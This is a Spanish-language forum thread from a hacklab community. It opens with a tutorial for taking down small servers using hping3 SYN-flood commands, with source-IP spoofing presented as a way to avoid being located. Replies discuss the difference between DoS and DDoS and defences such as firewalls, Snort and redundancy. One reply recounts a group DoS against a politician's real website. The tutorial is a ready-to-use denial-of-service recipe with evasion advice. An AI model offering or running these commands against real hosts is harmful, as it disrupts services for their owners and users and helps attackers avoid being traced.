Como tirar servidores con cualquier distribucion de ubuntu

Hola,antes de nada queria presentarme soy Pablo Martinez he participado en las Jornadas Hacklab iii y hoy les enseñare a tirar servidores pequeños con ubuntu.

Antes de nada esto es para su uso educativo nunca tiren servidores sin NINGUNA AUTORIZACION

Bueno despues de esa advertencia continuamos,esto es lo que vamos a necesitar:

  • Un portatil
  • Ubuntu o una distribucion basada en ubuntu
  • Aceso root
  • iP de la victima o Servidor.

Lo primero que vamos a hacer es abrir un terminal y vamos a meter este comando:

sudo apt-get install hping3

El programa que vamos a utilizar se llama hping esta "obra de arte de programa"es una herramienta en linea de comandos que nos permite crear y analizar paquetes TCP/IP, y como tal tiene un muchas utilidades.Una vez que se instale para usarla vais a tener que poner en la linea de comandos:

sudo hping3 y os pedira vuestra contraseña de usuario.

Ahora explicare el comando “magico” el ejemplo para atacar seria este:

hping3 -a ip_falsa -p 80 -S --flood ip_victima

Ahora explicare que significa cada parte del comando:

-p 80 es el puerto que elegimos atacar

-S activa el flag Syn

flood le indica a hping que envie los paquetes a la máxima velocidad posible

-ip_victima es la ip o dominio a atacar

Si queremos que nuestra ip no sea visible podemos añadirle la opción –a y la ip que vamos a falsear o bien utilizar –rand-source con lo que se generan direcciones de origen ip al azar:

hping3 --randsource -p80 -S --flood ip_victima

Tambien se pude atacar sin ip pero no es recomendable te juegas a que localizen tu ip:

hping3 -p 80 -S --flood ip_victima

Antes de terminar este tema queria comentar que si os da un error primero poned esto en la linea de comandos y luego el ataque: sudo hping3

SALUDOS

2 Me gusta

Buena esa, ¿te animas a ver cómo evitar este tipo de ataques?, (por cierto, soy el que dio la charla de introducción a la consola de linux). Se podría dar un taller bastante interesante.

Creo que si,lo pensare.

En primer lugar, bienvenido al foro! Te he recolocado el tema en su sitio (la categoría correcta es Seguridad Informática).

Por otro lado, en mis años mozos hacíamos esto con LOIC, que recuerdos. Lo que estás haciendo es un ataque de denegación de servicio (DoS), mediante el envío masivo de peticiones hacia un servidor. Este tipo de ataque, aunque básico, con una sola máquina es bastante inofensivo a menos que estés atacando un servidor muy pequeño, y tardarías bastante en conseguir tumbarlo.

Quizás te interesaría echar un vistazo a Kali Linux, una distribución de pentesting.

Por otro lado, @LordCalvister, la mejor forma de evitar los (D)DoS, es utilizar la redundancia: ten varias máquinas funcionando, y si una cae, automáticamente se recupera el servidor en otra máquina. De similar forma a las RAID de discos duros. Pero seguramente @Jesus pueda dar más luz sobre este asunto, no toco estas cosas desde hace algunos años.

Si se lo decimos no tiene gracia. Lo divertido de esto es descubrirlo paso a paso

Yo no lo veria tan inonfensivo,si tiene varias lineas de comando atacando la fuerza del ataque se multiplica por las lineas que tengas abiertas,ayer en una desmostracion de un compañero tuyo le tire su servidor de azure con 4 lineas de comandos abiertas en 10 minutos aproximadamente.

1 me gusta

Así sería la máquina… Los servidores de verdad, resisten una buena cantidad de peticiones por segundo.

Una cosa que hay que tener en cuenta son los nucleos del procesador para tirar servidores medianos por lo menos abria que tener abiertas 50-100 ataques a la vez en la linea de comandos y con un pentium 4 poca cosa se puede hacer.

Por eso existen los DDoS.

El programa de linea de comandos que os he enseñado sirve para hacer DDoS y tambien sirve para el tcp/ip,firewalls,etc.

Pero si se hace desde una sola máquina, no es DDoS, sino DoS xD Un DDoS es un ataque distribuido, si se hace desde una misma máquina (independientemente de cuantas terminales tengas abiertas en el momento), no es distribuido sino centralizado.

OK :sunglasses:

Ten en cuenta que estás limitado por la cantidad de paquetes que tu maquina pueda emitir en el tiempo.

También debo indicar que la caída no fue del servidor (de hecho, por el puerto 1515 estaba recibiendo las alertas de OSSEC que enseñé). El efecto en este caso fue la saturación del puerto 22 (no era capaz de atender tantas peticiones). Es una denegación de servicio, pero de saturar un puerto a tirar una maquina hay una gran diferencia :wink:

Depende mucho de la técnica utilizada. Un ping flood se podría evitar fácilmente con una configuración adecuada de firewall. Incluso con un network-ids [1] se podría detectar y reaccionar de forma dinamica a dicho ataque.

[1] https://www.snort.org/

Eso había pensado también, seguro que IPTables se puede configurar para evitar exceso de peticiones desde una misma IP.

1 me gusta

¡Menuda presentación @Minekart124! ¡dando tralla!

:smiley:

2 Me gusta

Lo de los paquetes tienes razon,pero solo sature el puerto porque la tarjeta de red wifi integrada del portatil es una basura si me hubiera traido mi tarjeta wifi alfa seria otra cosa, esa tarjeta se puede poner en modo monitor ademas de que tiene un chip atheros que es mejor que un chip intel.

En un supercurso piratón online, hicimos un ataque dos como ejemplo. Estabamos conectados unos 40. Se hizo contra una web de un político catalán conocido pero poco importante.
Lo único que logramos fué enlentecer la web. También es verdad que tampoco era el objetivo tirarla, solo aprender y solo duró unos minutos.

Es que, como he dicho, en un servidor “de verdad”, se necesita una cantidad INMENSA de peticiones por segundo para conseguir que caiga. Esto lo mismo se podría probar con una PCB con menos de 512 MB de RAM y algún procesador chustero, que estemos usando como servidor y que no sea una PiZero por si peta y echamos a perder semanas de no stock available.

Como proyecto de futuro para GESIAL.

1 me gusta

OjO: no es legal hacer un DoS a un servidor sin tener permiso.